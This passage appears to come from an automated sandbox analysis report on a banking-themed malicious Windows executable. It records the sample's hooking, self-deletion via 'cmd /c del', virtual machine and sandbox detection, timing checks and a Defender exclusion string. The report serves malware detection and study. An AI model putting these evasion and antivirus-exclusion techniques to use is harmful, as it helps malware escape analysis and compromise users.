          Persistence and Installation Behavior:

          Uses ipconfig to lookup or modify the Windows network settings
          Source: C:\Windows\explorer.exeProcess created: C:\Windows\SysWOW64\ipconfig.exe C:\Windows\SysWOW64\ipconfig.exe

          Hooking and other Techniques for Hiding and Protection:

          Modifies the prolog of user mode functions (user mode inline hooks)
          Source: explorer.exeUser mode code has changed: module: user32.dll function: PeekMessageA new code: 0x48 0x8B 0xB8 0x87 0x7E 0xEF
          Self deletion via cmd delete
          Source: C:\Windows\SysWOW64\ipconfig.exeProcess created: /c del "C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exe"
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\ipconfig.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior

          Malware Analysis System Evasion:

          Yara detected AntiVM3
          Source: Yara matchFile source: 0.2.HSBC ... Wire Transfer Copy.exe.2908f34.1.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 0.2.HSBC ... Wire Transfer Copy.exe.299b518.2.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 00000000.00000002.289914483.00000000028A1000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000000.00000002.290051006.000000000296B000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: Process Memory Space: HSBC ... Wire Transfer Copy.exe PID: 6892, type: MEMORYSTR
          Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
          Source: HSBC ... Wire Transfer Copy.exe, 00000000.00000002.289914483.00000000028A1000.00000004.00000001.sdmp, HSBC ... Wire Transfer Copy.exe, 00000000.00000002.290051006.000000000296B000.00000004.00000001.sdmpBinary or memory string: SBIEDLL.DLL
          Source: HSBC ... Wire Transfer Copy.exe, 00000000.00000002.289914483.00000000028A1000.00000004.00000001.sdmp, HSBC ... Wire Transfer Copy.exe, 00000000.00000002.290051006.000000000296B000.00000004.00000001.sdmpBinary or memory string: KERNEL32.DLL.WINE_GET_UNIX_FILE_NAME
          Tries to detect virtualization through RDTSC time measurements
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exeRDTSC instruction interceptor: First address: 0000000000409904 second address: 000000000040990A instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exeRDTSC instruction interceptor: First address: 0000000000409B7E second address: 0000000000409B84 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Windows\SysWOW64\ipconfig.exeRDTSC instruction interceptor: First address: 0000000002C69904 second address: 0000000002C6990A instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Windows\SysWOW64\ipconfig.exeRDTSC instruction interceptor: First address: 0000000002C69B7E second address: 0000000002C69B84 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exe TID: 7028Thread sleep time: -4611686018427385s >= -30000sJump to behavior
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exe TID: 7028Thread sleep time: -240000s >= -30000sJump to behavior
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exe TID: 7036Thread sleep count: 985 > 30Jump to behavior
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exe TID: 7028Thread sleep time: -239841s >= -30000sJump to behavior
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exe TID: 7036Thread sleep count: 1635 > 30Jump to behavior
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exe TID: 6896Thread sleep time: -36646s >= -30000sJump to behavior
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exe TID: 7028Thread sleep time: -239686s >= -30000sJump to behavior
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exe TID: 7028Thread sleep time: -239577s >= -30000sJump to behavior
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exe TID: 7028Thread sleep time: -239452s >= -30000sJump to behavior
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exe TID: 7028Thread sleep time: -239342s >= -30000sJump to behavior
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exe TID: 7028Thread sleep time: -239233s >= -30000sJump to behavior
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exe TID: 7028Thread sleep time: -239124s >= -30000sJump to behavior
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exe TID: 7028Thread sleep time: -238999s >= -30000sJump to behavior
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exe TID: 7028Thread sleep time: -238889s >= -30000sJump to behavior
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exe TID: 7028Thread sleep time: -238781s >= -30000sJump to behavior
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exe TID: 7028Thread sleep time: -238670s >= -30000sJump to behavior
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exe TID: 7028Thread sleep time: -238560s >= -30000sJump to behavior
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exe TID: 7028Thread sleep time: -238453s >= -30000sJump to behavior
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exe TID: 7028Thread sleep time: -238343s >= -30000sJump to behavior
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exe TID: 7028Thread sleep time: -238000s >= -30000sJump to behavior
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exe TID: 7028Thread sleep time: -237203s >= -30000sJump to behavior
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exe TID: 7028Thread sleep time: -236703s >= -30000sJump to behavior
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exe TID: 7028Thread sleep time: -236534s >= -30000sJump to behavior
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exe TID: 7028Thread sleep time: -236406s >= -30000sJump to behavior
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exe TID: 6936Thread sleep time: -922337203685477s >= -30000sJump to behavior
          Source: C:\Windows\explorer.exe TID: 6628Thread sleep time: -48000s >= -30000sJump to behavior
          Source: C:\Windows\SysWOW64\ipconfig.exe TID: 6264Thread sleep time: -36000s >= -30000sJump to behavior
          Source: C:\Windows\SysWOW64\ipconfig.exeLast function: Thread delayed
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exeCode function: 6_2_00409AB0 rdtsc 6_2_00409AB0
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exeThread delayed: delay time: 922337203685477Jump to behavior
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exeThread delayed: delay time: 240000Jump to behavior
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exeThread delayed: delay time: 239841Jump to behavior
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exeThread delayed: delay time: 239686Jump to behavior
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exeThread delayed: delay time: 239577Jump to behavior
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exeThread delayed: delay time: 239452Jump to behavior
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exeThread delayed: delay time: 239342Jump to behavior
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exeThread delayed: delay time: 239233Jump to behavior
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exeThread delayed: delay time: 239124Jump to behavior
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exeThread delayed: delay time: 238999Jump to behavior
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exeThread delayed: delay time: 238889Jump to behavior
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exeThread delayed: delay time: 238781Jump to behavior
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exeThread delayed: delay time: 238670Jump to behavior
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exeThread delayed: delay time: 238560Jump to behavior
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exeThread delayed: delay time: 238453Jump to behavior
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exeThread delayed: delay time: 238343Jump to behavior
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exeThread delayed: delay time: 238000Jump to behavior
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exeThread delayed: delay time: 237203Jump to behavior
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exeThread delayed: delay time: 236703Jump to behavior
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exeThread delayed: delay time: 236534Jump to behavior
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exeThread delayed: delay time: 236406Jump to behavior
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exeWindow / User API: threadDelayed 985Jump to behavior
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exeWindow / User API: threadDelayed 1635Jump to behavior
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exeProcess information queried: ProcessInformationJump to behavior
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exeThread delayed: delay time: 36646Jump to behavior
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exeThread delayed: delay time: 239686Jump to behavior
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exeThread delayed: delay time: 239577Jump to behavior
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exeThread delayed: delay time: 239452Jump to behavior
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exeThread delayed: delay time: 239342Jump to behavior
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exeThread delayed: delay time: 239233Jump to behavior
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exeThread delayed: delay time: 239124Jump to behavior
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exeThread delayed: delay time: 238999Jump to behavior
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exeThread delayed: delay time: 238889Jump to behavior
          Source: HSBC ... Wire Transfer Copy.exe, 00000000.00000002.290051006.000000000296B000.00000004.00000001.sdmpBinary or memory string: VMware SVGA IIBAdd-MpPreference -ExclusionPath "
          Source: explorer.exe, 0000000C.00000000.303809038.000000000EE50000.00000004.00000001.sdmpBinary or memory string: \\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000025700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#000000001F400000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000026700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}1
          Source: explorer.exe, 0000000C.00000000.303809038.000000000EE50000.00000004.00000001.sdmpBinary or memory string: \\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000025700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#000000001F400000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000026700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}b1
          Source: HSBC ... Wire Transfer Copy.exe, 00000000.00000002.290051006.000000000296B000.00000004.00000001.sdmpBinary or memory string: InstallPathJC:\PROGRAM FILES\VMWARE\VMWARE TOOLS\
          Source: explorer.exe, 0000000C.00000000.301310176.00000000086C9000.00000004.00000001.sdmpBinary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}
          Source: HSBC ... Wire Transfer Copy.exe, 00000000.00000002.290051006.000000000296B000.00000004.00000001.sdmpBinary or memory string: vmware
          Source: explorer.exe, 0000000C.00000000.335138574.0000000008778000.00000004.00000001.sdmpBinary or memory string: SCSI\Disk&Ven_VMware&Prod_Virtual_disk\5&1ec51bf7&0&000000}
          Source: explorer.exe, 0000000C.00000000.330618506.00000000067C2000.00000004.00000001.sdmpBinary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
          Source: explorer.exe, 0000000C.00000000.301310176.00000000086C9000.00000004.00000001.sdmpBinary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}&
          Source: explorer.exe, 0000000C.00000000.330618506.00000000067C2000.00000004.00000001.sdmpBinary or memory string: SCSI\CDROM&VEN_NECVMWAR&PROD_VMWARE_SATA_CD00\5&280B647&0&000000m32)
          Source: explorer.exe, 0000000C.00000000.301310176.00000000086C9000.00000004.00000001.sdmpBinary or memory string: SCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\5&280b647&0&000000
          Source: HSBC ... Wire Transfer Copy.exe, 00000000.00000002.290051006.000000000296B000.00000004.00000001.sdmpBinary or memory string: VMWAREDSOFTWARE\VMware, Inc.\VMware Tools
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exeCode function: 6_2_00409AB0 rdtsc 6_2_00409AB0
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exeProcess token adjusted: DebugJump to behavior
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exeCode function: 6_2_0162C962 mov eax, dword ptr fs:[00000030h]6_2_0162C962
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exeCode function: 6_2_0162B171 mov eax, dword ptr fs:[00000030h]6_2_0162B171
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exeCode function: 6_2_0164B944 mov eax, dword ptr fs:[00000030h]6_2_0164B944
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exeCode function: 6_2_01644120 mov eax, dword ptr fs:[00000030h]6_2_01644120
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exeCode function: 6_2_01644120 mov ecx, dword ptr fs:[00000030h]6_2_01644120
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exeCode function: 6_2_0165513A mov eax, dword ptr fs:[00000030h]6_2_0165513A
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exeCode function: 6_2_01629100 mov eax, dword ptr fs:[00000030h]6_2_01629100
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exeCode function: 6_2_016B41E8 mov eax, dword ptr fs:[00000030h]6_2_016B41E8
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exeCode function: 6_2_0162B1E1 mov eax, dword ptr fs:[00000030h]6_2_0162B1E1
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exeCode function: 6_2_016561A0 mov eax, dword ptr fs:[00000030h]6_2_016561A0
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exeCode function: 6_2_016E49A4 mov eax, dword ptr fs:[00000030h]6_2_016E49A4
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exeCode function: 6_2_016A69A6 mov eax, dword ptr fs:[00000030h]6_2_016A69A6
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exeCode function: 6_2_016A51BE mov eax, dword ptr fs:[00000030h]6_2_016A51BE
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exeCode function: 6_2_016499BF mov ecx, dword ptr fs:[00000030h]6_2_016499BF
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exeCode function: 6_2_016499BF mov eax, dword ptr fs:[00000030h]6_2_016499BF
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exeCode function: 6_2_0165A185 mov eax, dword ptr fs:[00000030h]6_2_0165A185
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exeCode function: 6_2_0164C182 mov eax, dword ptr fs:[00000030h]6_2_0164C182
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exeCode function: 6_2_01652990 mov eax, dword ptr fs:[00000030h]6_2_01652990
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exeCode function: 6_2_016F1074 mov eax, dword ptr fs:[00000030h]6_2_016F1074
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exeCode function: 6_2_016E2073 mov eax, dword ptr fs:[00000030h]6_2_016E2073
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exeCode function: 6_2_01640050 mov eax, dword ptr fs:[00000030h]6_2_01640050
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exeCode function: 6_2_0165002D mov eax, dword ptr fs:[00000030h]6_2_0165002D
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exeCode function: 6_2_0163B02A mov eax, dword ptr fs:[00000030h]6_2_0163B02A
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exeCode function: 6_2_0164A830 mov eax, dword ptr fs:[00000030h]6_2_0164A830
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exeCode function: 6_2_016F4015 mov eax, dword ptr fs:[00000030h]6_2_016F4015
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exeCode function: 6_2_016A7016 mov eax, dword ptr fs:[00000030h]6_2_016A7016
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exeCode function: 6_2_0164B8E4 mov eax, dword ptr fs:[00000030h]6_2_0164B8E4
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exeCode function: 6_2_016240E1 mov eax, dword ptr fs:[00000030h]6_2_016240E1
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exeCode function: 6_2_016258EC mov eax, dword ptr fs:[00000030h]6_2_016258EC
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exeCode function: 6_2_016BB8D0 mov eax, dword ptr fs:[00000030h]6_2_016BB8D0
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exeCode function: 6_2_016BB8D0 mov ecx, dword ptr fs:[00000030h]6_2_016BB8D0
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exeCode function: 6_2_016520A0 mov eax, dword ptr fs:[00000030h]6_2_016520A0
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exeCode function: 6_2_016690AF mov eax, dword ptr fs:[00000030h]6_2_016690AF
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exeCode function: 6_2_0165F0BF mov ecx, dword ptr fs:[00000030h]6_2_0165F0BF
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exeCode function: 6_2_0165F0BF mov eax, dword ptr fs:[00000030h]6_2_0165F0BF
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exeCode function: 6_2_01629080 mov eax, dword ptr fs:[00000030h]6_2_01629080
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exeCode function: 6_2_016A3884 mov eax, dword ptr fs:[00000030h]6_2_016A3884
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exeCode function: 6_2_0162DB60 mov ecx, dword ptr fs:[00000030h]6_2_0162DB60
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exeCode function: 6_2_01653B7A mov eax, dword ptr fs:[00000030h]6_2_01653B7A
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exeCode function: 6_2_0162DB40 mov eax, dword ptr fs:[00000030h]6_2_0162DB40
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exeCode function: 6_2_016F8B58 mov eax, dword ptr fs:[00000030h]6_2_016F8B58
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exeCode function: 6_2_0162F358 mov eax, dword ptr fs:[00000030h]6_2_0162F358
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exeCode function: 6_2_0164A309 mov eax, dword ptr fs:[00000030h]6_2_0164A309
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exeCode function: 6_2_016E131B mov eax, dword ptr fs:[00000030h]6_2_016E131B
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exeCode function: 6_2_016503E2 mov eax, dword ptr fs:[00000030h]6_2_016503E2
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exeCode function: 6_2_0164DBE9 mov eax, dword ptr fs:[00000030h]6_2_0164DBE9
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exeCode function: 6_2_016D23E3 mov ecx, dword ptr fs:[00000030h]6_2_016D23E3
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exeCode function: 6_2_016D23E3 mov eax, dword ptr fs:[00000030h]6_2_016D23E3
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exeCode function: 6_2_016A53CA mov eax, dword ptr fs:[00000030h]6_2_016A53CA
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exeCode function: 6_2_01654BAD mov eax, dword ptr fs:[00000030h]6_2_01654BAD
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exeCode function: 6_2_016F5BA5 mov eax, dword ptr fs:[00000030h]6_2_016F5BA5
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exeCode function: 6_2_016E138A mov eax, dword ptr fs:[00000030h]6_2_016E138A
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exeCode function: 6_2_01631B8F mov eax, dword ptr fs:[00000030h]6_2_01631B8F
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exeCode function: 6_2_016DD380 mov ecx, dword ptr fs:[00000030h]6_2_016DD380
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exeCode function: 6_2_01652397 mov eax, dword ptr fs:[00000030h]6_2_01652397
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exeCode function: 6_2_0165B390 mov eax, dword ptr fs:[00000030h]6_2_0165B390
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exeCode function: 6_2_016DB260 mov eax, dword ptr fs:[00000030h]6_2_016DB260
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exeCode function: 6_2_016F8A62 mov eax, dword ptr fs:[00000030h]6_2_016F8A62
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exeCode function: 6_2_0166927A mov eax, dword ptr fs:[00000030h]6_2_0166927A
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exeCode function: 6_2_01629240 mov eax, dword ptr fs:[00000030h]6_2_01629240
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exeCode function: 6_2_016EEA55 mov eax, dword ptr fs:[00000030h]6_2_016EEA55
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exeCode function: 6_2_016B4257 mov eax, dword ptr fs:[00000030h]6_2_016B4257
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exeCode function: 6_2_01664A2C mov eax, dword ptr fs:[00000030h]6_2_01664A2C
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exeCode function: 6_2_0164A229 mov eax, dword ptr fs:[00000030h]6_2_0164A229
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exeCode function: 6_2_01638A0A mov eax, dword ptr fs:[00000030h]6_2_01638A0A
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exeCode function: 6_2_01625210 mov eax, dword ptr fs:[00000030h]6_2_01625210
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exeCode function: 6_2_01625210 mov ecx, dword ptr fs:[00000030h]6_2_01625210
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exeCode function: 6_2_0162AA16 mov eax, dword ptr fs:[00000030h]6_2_0162AA16
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exeCode function: 6_2_01643A1C mov eax, dword ptr fs:[00000030h]6_2_01643A1C
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exeCode function: 6_2_016EAA16 mov eax, dword ptr fs:[00000030h]6_2_016EAA16
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exeCode function: 6_2_01652AE4 mov eax, dword ptr fs:[00000030h]6_2_01652AE4
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exeCode function: 6_2_016E4AEF mov eax, dword ptr fs:[00000030h]6_2_016E4AEF
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exeCode function: 6_2_01652ACB mov eax, dword ptr fs:[00000030h]6_2_01652ACB
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exeCode function: 6_2_016252A5 mov eax, dword ptr fs:[00000030h]6_2_016252A5
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exeCode function: 6_2_016252A5 mov eax, dword ptr fs:[00000030h]6_2_016252A5
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exeCode function: 6_2_016252A5 mov eax, dword ptr fs:[00000030h]6_2_016252A5
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exeCode function: 6_2_016252A5 mov eax, dword ptr fs:[00000030h]6_2_016252A5
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exeCode function: 6_2_016252A5 mov eax, dword ptr fs:[00000030h]6_2_016252A5
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exeCode function: 6_2_0163AAB0 mov eax, dword ptr fs:[00000030h]6_2_0163AAB0
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exeCode function: 6_2_0163AAB0 mov eax, dword ptr fs:[00000030h]6_2_0163AAB0
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exeCode function: 6_2_0165FAB0 mov eax, dword ptr fs:[00000030h]6_2_0165FAB0
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exeCode function: 6_2_0165D294 mov eax, dword ptr fs:[00000030h]6_2_0165D294
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exeCode function: 6_2_0165D294 mov eax, dword ptr fs:[00000030h]6_2_0165D294
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exeCode function: 6_2_0164C577 mov eax, dword ptr fs:[00000030h]6_2_0164C577
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exeCode function: 6_2_0164C577 mov eax, dword ptr fs:[00000030h]6_2_0164C577
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exeCode function: 6_2_01663D43 mov eax, dword ptr fs:[00000030h]6_2_01663D43
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exeCode function: 6_2_016A3540 mov eax, dword ptr fs:[00000030h]6_2_016A3540
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exeCode function: 6_2_016D3D40 mov eax, dword ptr fs:[00000030h]6_2_016D3D40
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exeCode function: 6_2_01647D50 mov eax, dword ptr fs:[00000030h]6_2_01647D50
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exeCode function: 6_2_0162AD30 mov eax, dword ptr fs:[00000030h]6_2_0162AD30
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exeCode function: 6_2_01633D34 mov eax, dword ptr fs:[00000030h]6_2_01633D34
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exeCode function: 6_2_01633D34 mov eax, dword ptr fs:[00000030h]6_2_01633D34
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exeCode function: 6_2_01633D34 mov eax, dword ptr fs:[00000030h]6_2_01633D34
